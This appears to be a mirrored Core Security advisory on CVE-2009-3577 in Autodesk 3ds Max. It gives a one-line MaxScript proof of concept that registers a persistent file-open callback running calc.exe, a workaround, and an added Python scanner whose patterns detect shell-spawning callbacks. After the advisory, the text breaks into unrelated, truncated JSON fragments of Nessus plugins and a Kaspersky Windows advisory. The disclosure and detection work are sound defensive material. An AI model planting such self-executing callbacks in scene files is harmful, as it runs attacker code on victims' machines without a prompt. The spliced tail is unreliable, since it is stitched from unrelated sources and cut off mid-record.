Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
2009-11-23T00:00:00
ID 1337DAY-ID-8160 Type zdt Reporter Core Security Modified 2009-11-23T00:00:00
Description
Exploit for unknown platform in category local exploits
==================================================================
Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
==================================================================
# Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
# CVE-ID: CVE-2009-3577
# OSVDB-ID: ()
# Author: Core Security
# Published: 2009-11-23
# Verified: yes
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
1. *Advisory Information*
Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
Advisory Id: CORE-2009-0909
Advisory URL:
http://www.coresecurity.com/content/3dsmax-arbitrary-command-execution
Date published: 2009-11-23
Date of last update: 2009-11-20
Vendors contacted: Autodesk
Release mode: User release
2. *Vulnerability Information*
Class: Failure to Sanitize Data into a Different Plane [CWE-74]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 36634
CVE Name: CVE-2009-3577
3. *Vulnerability Description*
Autodesk 3D Studio Max [2] is a modeling, animation and rendering
package widely used for video game, film, multimedia and web content
development. The software provides a built-in scripting language,
allowing users to bind custom code to actions performed in the
application. Execution of scripting code does not require explicit
permission from the user. This mechanism can be exploited by an
attacker to execute arbitrary code by enticing a victim to open a .max
file with MaxScript application callbacks embedded.
4. *Vulnerable packages*
. Autodesk 3DSMax 2010
. Autodesk 3DSMax 2009
. Autodesk 3DSMax 2008
. Autodesk 3DSMax 9
. Autodesk 3DSMax 8
. Autodesk 3DSMax 7
. Autodesk 3DSMax 6
5. *Vendor Information, Solutions and Workarounds*
The vendor did not provide fixes or workaround information.
Until a vendor fix is available, you can stop embedded MaxScript from
being loaded automatically when a scene is opened by following these
steps:
 . Go to Customize menu > Preferences > Preference Settings dialog >
MAXScript.
 . Uncheck "Load/Save Scene Scripts".
 . Uncheck "Load/Save Persistent Globals".
Note that this also prevents legitimate scene scripts and persistent
globals from loading, and that it does not clean a malicious file: the
embedded callback stays in the scene and will run on any installation
where these settings are enabled.
6. *Credits*
This vulnerability was discovered and researched by Sebastian Tello
from Core Security Technologies during Bugweek 2009 [1].
The publication of this advisory was coordinated by Fernando Russ from
Core Security Advisories Team.
7. *Technical Description / Proof of Concept Code*
Autodesk 3D Studio Max provides a built-in scripting language called
MaxScript, which can be used to automate repetitive tasks, combine
existing functionality in new ways, develop new tools and user
interfaces and much more. Max allows users to bind MaxScript to
application callbacks and to persist those callbacks inside the scene
file, so a crafted .max file can carry a callback that runs attacker
controlled code as soon as the victim opens it, with no prompt.
A Proof of Concept file can be obtained by following these simple
steps. Open Max, press F11 (MaxScript Listener), paste this code, and
save the scene as a .max file. Because the callback is registered with
persistent:true it is stored in the scene, and it fires on the
#filePostOpen event every time the file is opened:
/-----
-- Registers a persistent MaxScript callback on the file-open event that
-- runs a shell command (here calc.exe) whenever the scene is loaded.
callbacks.addScript #filePostOpen ("DOSCommand(\"calc.exe\")") id:#mbLoadCallback persistent:true
-----/
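The following triage script is an added example; it is not part of the Core advisory and not Autodesk code. It looks for the self-executing pattern the advisory describes (a callbacks.addScript registration bound to a load-time event and saved with persistent:true) plus the MaxScript primitives that spawn external programs, inside scene files received from untrusted sources. Its assumptions are stated in the code: script text is assumed to be stored in the scene container as 8-bit text or UTF-16LE, compressed scenes are not handled, the indicator list is a heuristic, and the sample inputs are constructed byte strings rather than real .max files.

```python
"""Heuristic triage of 3ds Max scene files for embedded MAXScript callbacks.

Added example; not part of the Core advisory and not Autodesk code.
Assumptions (not verified against the .max container format): script text
is stored inside the scene as 8-bit text or UTF-16LE, and the scene is not
saved compressed. Treat a hit as a reason to inspect the file, not as proof.
"""
import re
import sys
from pathlib import Path

# Indicator patterns. The first three describe the CVE-2009-3577 mechanism
# itself (a script callback, bound to a load-time event, persisted in the
# scene); the last lists MAXScript primitives that spawn external programs.
INDICATORS = {
    "callback registration": r"callbacks\.addScript",
    "load-time event":       r"#file(Pre|Post)Open",
    "persisted with scene":  r"persistent\s*:\s*true",
    "shell execution":       r"\b(Hidden)?DOSCommand\b|\bShellLaunch\b",
}
_PATTERNS = {name: re.compile(p, re.IGNORECASE) for name, p in INDICATORS.items()}


def searchable_text(data: bytes) -> str:
    """Fold UTF-16LE ASCII-range text into 8-bit text by dropping NUL bytes,
    so one pass over the result catches both encodings (assumption: scripts
    are stored as one of the two)."""
    return data.replace(b"\x00", b"").decode("latin-1")


def scan_bytes(data: bytes) -> dict:
    """Return {indicator name: sorted unique matches} for every indicator hit."""
    text = searchable_text(data)
    hits = {}
    for name, pattern in _PATTERNS.items():
        found = sorted({m.group(0) for m in pattern.finditer(text)})
        if found:
            hits[name] = found
    return hits


def verdict(hits: dict) -> str:
    """Classify: a callback that is both registered and persisted is the
    self-executing pattern from the advisory, whatever payload it carries."""
    if {"callback registration", "persisted with scene"} <= set(hits):
        return "self-executing callback"
    if hits:
        return "suspicious"
    return "clean"


def scan_file(path) -> tuple:
    """Scan one file on disk; returns (verdict, hits)."""
    hits = scan_bytes(Path(path).read_bytes())
    return verdict(hits), hits


# Constructed sample inputs (not real .max files): a compound-file magic
# followed by the advisory's PoC line stored as UTF-16LE, and a benign scene.
_POC_LINE = ('callbacks.addScript #filePostOpen ("DOSCommand(\\"calc.exe\\")") '
             'id:#mbLoadCallback persistent:true')
SAMPLE_POC = b"\xd0\xcf\x11\xe0" + b"\x00" * 12 + _POC_LINE.encode("utf-16-le")
SAMPLE_CLEAN = b"\xd0\xcf\x11\xe0" + b"\x00" * 12 + b"Box001 Sphere002 Standard Material"


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for arg in sys.argv[1:]:
            result, found = scan_file(arg)
            print(f"{arg}: {result} {found}")
    else:
        for label, sample in (("sample-poc", SAMPLE_POC), ("sample-clean", SAMPLE_CLEAN)):
            found = scan_bytes(sample)
            print(f"{label}: {verdict(found)} {found}")
```

Run it with one or more scene paths as arguments, or with no arguments to see the two constructed samples classified. The verdict deliberately keys on the registration plus persistence pair rather than on the payload, since an attacker can replace DOSCommand with any other MaxScript that reaches the operating system.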
8. *Report Timeline*
. 2009-08-25:
Core Security Technologies asks the Autodesk Assistance Team for a
security contact to report the vulnerability.
. 2009-09-22:
Core asks the Autodesk Assistance Team for a security contact to
report the vulnerability.
. 2009-10-09:
Core contacts CERT to obtain security contact information for Autodesk.
. 2009-10-16:
CERT acknowledges the communication.
. 2009-10-19:
CERT sends their available contact information for Autodesk.
. 2009-10-19:
Core notifies Autodesk of the vulnerability report and announces its
initial plan to publish the content on November 2nd, 2009. Core
requests an acknowledgement within two working days and asks whether
the details should be sent encrypted or in plaintext.
. 2009-10-19:
Autodesk acknowledges the report and requests the information to be
provided in encrypted form.
. 2009-10-20:
Core sends draft advisory and steps to reproduce the issue.
. 2009-10-27:
Core asks Autodesk about the status of the vulnerability report sent
on October 20th, 2009.
. 2009-10-27:
Autodesk acknowledges the communication indicating that the pertinent
Product Managers have been informed and are formulating a response.
. 2009-11-06:
Core notifies Autodesk about the missed deadline of November 2nd, 2009
and requests a status update. Publication of CORE-2009-0909 is
re-scheduled to November 16th, 2009 and is subject to change based on
concrete feedback from Autodesk.
. 2009-11-23:
Given the lack of response from Autodesk, Core decides to publish the
advisory CORE-2009-0909 as "user release".
9. *References*
[1] The author participated in Core Bugweek 2009 as member of the team
"Gimbal Lock N Load".
[2]
http://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: http://www.coresecurity.com/corelabs.
11. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN
TPwAn1AMCamFLaX3gHyUys//tHcyhlvn
=fPrL
-----END PGP SIGNATURE-----
# 0day.today [2018-01-04] #
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1474\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ca0c9141\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2019-11-01T02:40:11", "bulletinFamily": "scanner", "description": "The remote FreeSWITCH server is prior to version 1.4.26 or 1.6.x prior\nto 1.6.5. It is, therefore, affected by a remote code execution\nvulnerability due to improper validation of user-supplied input to the\nparse_string() function in esl_json.c, switch_json.c, and ks_json.c. A\nremote attacker can exploit this, via a crafted JSON message, to cause\na heap-based buffer overflow condition, resulting in a denial of\nservice or the execution of arbitrary code.", "modified": "2019-11-02T00:00:00", "id": "FREESWITCH_FS8160.NASL", "href": "https://www.tenable.com/plugins/nessus/88696", "published": "2016-02-11T00:00:00", "title": "FreeSWITCH < 1.4.26 / 1.6.x < 1.6.5 JSON Parser RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88696);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\"CVE-2015-7392\", \"CVE-2015-8311\");\n script_bugtraq_id(76976);\n script_xref(name:\"TRA\", value:\"TRA-2015-05\");\n\n script_name(english:\"FreeSWITCH < 1.4.26 / 1.6.x < 1.6.5 JSON Parser RCE\");\n script_summary(english:\"Checks the version of FreeSWITCH.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeSWITCH server is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote FreeSWITCH server is prior to version 1.4.26 or 1.6.x prior\nto 1.6.5. It is, therefore, affected by a remote code execution\nvulnerability due to improper validation of user-supplied input to the\nparse_string() function in esl_json.c, switch_json.c, and ks_json.c. 
A\nremote attacker can exploit this, via a crafted JSON message, to cause\na heap-based buffer overflow condition, resulting in a denial of\nservice or the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://freeswitch.org/jira/browse/FS-8160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2015-05\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to FreeSWITCH version 1.4.26 / 1.6.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/11\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:freeswitch:freeswitch\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"freeswitch_detection.nbin\");\n script_require_keys(\"Settings/ParanoidReport\", \"sip/freeswitch/present\");\n script_require_ports(\"Services/udp/sip\", \"Services/sip\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = \"FreeSWITCH\";\nget_kb_item_or_exit(\"sip/freeswitch/present\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nerrors = make_list();\nudp_ports = 
get_kb_list(\"Services/udp/sip\");\ntcp_ports = get_kb_list(\"Services/sip\");\nif (isnull(tcp_ports) && isnull(udp_ports)) audit(AUDIT_NOT_INST, appname);\n\nfunction is_vulnerable(version, commit, proto, port)\n{\n local_var report = '';\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to determine the FreeSWITCH version on \" + proto + \"/\" + port + \".\");\n return FALSE;\n }\n\n # the fix was pushed out in 1.6.5\n if (ver_compare(ver:version, fix:\"1.6.5\", strict:FALSE) < 0)\n {\n # freeswitch now maintains a 1.6 branch and a 1.4 branch. Determine\n # if we are looking at a 1.4 line\n if (ver_compare(ver:version, fix:\"1.5\", strict:FALSE) < 0)\n {\n if (ver_compare(ver:version, fix:\"1.4.26\", strict:FALSE) < 0)\n {\n report = \n '\\n Installed version : ' + version + \n '\\n Fixed version : 1.4.26\\n';\n }\n }\n else\n {\n report = \n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.6.5\\n';\n }\n }\n\n if (report != '')\n {\n if (report_verbosity > 0) security_hole(extra:report, port:port, proto:proto);\n else security_hole(port:port, proto:proto);\n return TRUE;\n }\n return FALSE;\n}\n\nis_vuln = FALSE;\nif (!isnull(tcp_ports))\n{\n foreach port (make_list(tcp_ports))\n {\n version = get_kb_item(\"sip/freeswitch/tcp/\" + port + \"/version\");\n if (!version) continue;\n if (!isnull(version) && is_vulnerable(version:version, proto:\"tcp\", port:port)) is_vuln = TRUE;\n }\n}\nif (!isnull(udp_ports))\n{\n foreach port (make_list(udp_ports))\n {\n version = get_kb_item(\"sip/freeswitch/udp/\" + port + \"/version\");\n if (!version) continue;\n if (!isnull(version) && is_vulnerable(version:version, proto:\"udp\", port:port)) is_vuln = TRUE;\n }\n}\n\nif (max_index(errors))\n{\n errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n exit(1, errmsg);\n} else if(!is_vuln) audit(AUDIT_INST_VER_NOT_VULN, appname);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], 
"kaspersky": [{"lastseen": "2019-03-21T00:14:08", "bulletinFamily": "info", "description": "### *Detect date*:\n09/11/2018\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple serious vulnerabilities were found in PRODUCT. Malicious users can exploit these vulnerabilities to obtain sensitive information, gain privileges, cause denial of service, execute arbitrary code, bypass security restrictions.\n\n### *Affected products*:\nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1703 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1709 for 64-based Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 for x64-based Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 8.1 for 32-bit systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 \nWindows Server 2012 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2016 \nWindows Server 2016 (Server Core installation) \nWindows Server, version 1709 (Server Core Installation) \nWindows Server, version 1803 (Server Core Installation)\n\n### *Solution*:\nInstall necessary updates 
from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2018-8336](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8336>) \n[CVE-2018-8433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8433>) \n[CVE-2018-8462](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8462>) \n[CVE-2018-8442](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8442>) \n[CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>) \n[CVE-2018-8438](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8438>) \n[CVE-2018-8455](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8455>) \n[CVE-2018-8392](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8392>) \n[CVE-2018-8410](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8410>) \n[CVE-2018-8335](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8335>) \n[CVE-2018-8444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8444>) \n[CVE-2018-8441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8441>) \n[CVE-2018-8332](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8332>) \n[CVE-2018-0965](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0965>) \n[CVE-2018-8422](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8422>) \n[CVE-2018-8271](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8271>) \n[CVE-2018-8437](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8437>) \n[CVE-2018-8443](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8443>) 
\n[CVE-2018-8475](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8475>) \n[CVE-2018-8419](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8419>) \n[CVE-2018-8434](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8434>) \n[CVE-2018-8420](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8420>) \n[CVE-2018-8436](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8436>) \n[CVE-2018-8439](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8439>) \n[CVE-2018-8449](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8449>) \n[CVE-2018-8435](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8435>) \n[CVE-2018-8424](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8424>) \n[CVE-2018-8468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8468>) \n[CVE-2018-8393](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8393>) \n[CVE-2018-8445](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8445>) \n[CVE-2018-8337](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8337>) \n[CVE-2018-8446](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8446>) \n[ADV180022](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180022>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2018-8336](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8336>)2.5Warning \n[CVE-2018-8433](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8433>)4.7Warning \n[CVE-2018-8462](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8462>)7.0Warning 
\n[CVE-2018-8442](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8442>)2.5Warning \n[CVE-2018-8440](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8440>)7.8Warning \n[CVE-2018-8438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8438>)5.8Warning \n[CVE-2018-8455](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8455>)2.5Warning \n[CVE-2018-8392](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8392>)7.8Warning \n[CVE-2018-8410](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8410>)7.0Warning \n[CVE-2018-8335](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8335>)4.8Warning \n[CVE-2018-8444](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8444>)7.0Warning \n[CVE-2018-8441](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8441>)7.0Warning \n[CVE-2018-8332](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8332>)8.8Warning \n[CVE-2018-0965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0965>)7.6Warning \n[CVE-2018-8422](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8422>)4.7Warning \n[CVE-2018-8271](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8271>)2.5Warning \n[CVE-2018-8437](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8437>)7.6Warning \n[CVE-2018-8443](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8443>)2.5Warning \n[CVE-2018-8475](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8475>)8.8Warning \n[CVE-2018-8419](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8419>)2.5Warning \n[CVE-2018-8434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8434>)7.6Warning \n[CVE-2018-8420](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8420>)7.5Warning \n[CVE-2018-8436](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8436>)7.6Warning \n[CVE-2018-8439](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8439>)7.6Warning 
\n[CVE-2018-8449](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8449>)5.3Warning \n[CVE-2018-8435](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8435>)4.2Warning \n[CVE-2018-8424](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8424>)4.7Warning \n[CVE-2018-8468](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8468>)4.3Warning \n[CVE-2018-8393](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8393>)7.8Warning \n[CVE-2018-8445](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8445>)2.5Warning \n[CVE-2018-8337](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8337>)5.3Warning \n[CVE-2018-8446](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8446>)2.5Warning\n\n### *KB list*:\n[4457984](<http://support.microsoft.com/kb/4457984>) \n[4458010](<http://support.microsoft.com/kb/4458010>) \n[4457128](<http://support.microsoft.com/kb/4457128>) \n[4457131](<http://support.microsoft.com/kb/4457131>) \n[4457132](<http://support.microsoft.com/kb/4457132>) \n[4457142](<http://support.microsoft.com/kb/4457142>) \n[4457138](<http://support.microsoft.com/kb/4457138>) \n[4457129](<http://support.microsoft.com/kb/4457129>) \n[4457143](<http://support.microsoft.com/kb/4457143>) \n[4457144](<http://support.microsoft.com/kb/4457144>) \n[4457145](<http://support.microsoft.com/kb/4457145>) \n[4457135](<http://support.microsoft.com/kb/4457135>) \n[4457140](<http://support.microsoft.com/kb/4457140>)\n\n### *Microsoft official advisories*:", "modified": "2019-03-07T00:00:00", "published": "2018-09-11T00:00:00", "id": "KLA11316", "href": 